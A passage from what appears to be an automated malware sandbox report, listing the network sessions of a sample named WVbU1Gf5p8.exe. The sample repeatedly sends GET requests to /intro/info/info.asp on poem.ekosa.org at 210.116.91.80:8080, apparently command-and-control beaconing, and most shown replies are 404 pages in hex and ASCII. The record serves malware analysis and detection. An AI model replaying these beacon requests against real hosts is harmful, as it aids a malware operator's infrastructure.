      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      108192.168.2.449886210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:00.321032047 CET5095OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:00.581624031 CET5096INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      109192.168.2.449887210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:00.842541933 CET5097OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:01.100214005 CET5097INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      11192.168.2.449772210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:02.931457043 CET252OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:03.193223953 CET253INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:02 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      110192.168.2.449888210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:01.374209881 CET5098OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:01.637274981 CET5098INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      111192.168.2.449889210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:02.032150984 CET5099OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:56:02.300961018 CET5100INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:56:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      112192.168.2.449890210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:56:02.600404024 CET5100OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive


      Session IDSource IPSource PortDestination IPDestination PortProcess
      113192.168.2.449891210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      114192.168.2.449892210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      115192.168.2.449893210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      116192.168.2.449894210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      117192.168.2.449895210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      118192.168.2.449896210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      119192.168.2.449897210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      12192.168.2.449774210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:03.585913897 CET260OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:03.857309103 CET266INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:03 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      120192.168.2.449898210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      121192.168.2.449899210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      122192.168.2.449900210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      123192.168.2.449901210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      124192.168.2.449902210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      125192.168.2.449903210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      126192.168.2.449904210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      127192.168.2.449905210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      128192.168.2.449906210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      129192.168.2.449907210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      13192.168.2.449775210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:04.136393070 CET267OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:04.406142950 CET272INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:03 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      130192.168.2.449908210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      131192.168.2.449909210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      132192.168.2.449910210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      133192.168.2.449911210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      134192.168.2.449912210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      135192.168.2.449913210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      136192.168.2.449914210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      137192.168.2.449915210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      138192.168.2.449916210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      139192.168.2.449917210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      14192.168.2.449777210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:04.690062046 CET276OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:04.969022989 CET280INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:04 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      140192.168.2.449918210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      141192.168.2.449919210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      142192.168.2.449920210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      143192.168.2.449921210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      144192.168.2.449922210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      145192.168.2.449923210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      146192.168.2.449924210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      147192.168.2.449925210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      148192.168.2.449926210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
      149192.168.2.449927210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData


      Session IDSource IPSource PortDestination IPDestination PortProcess
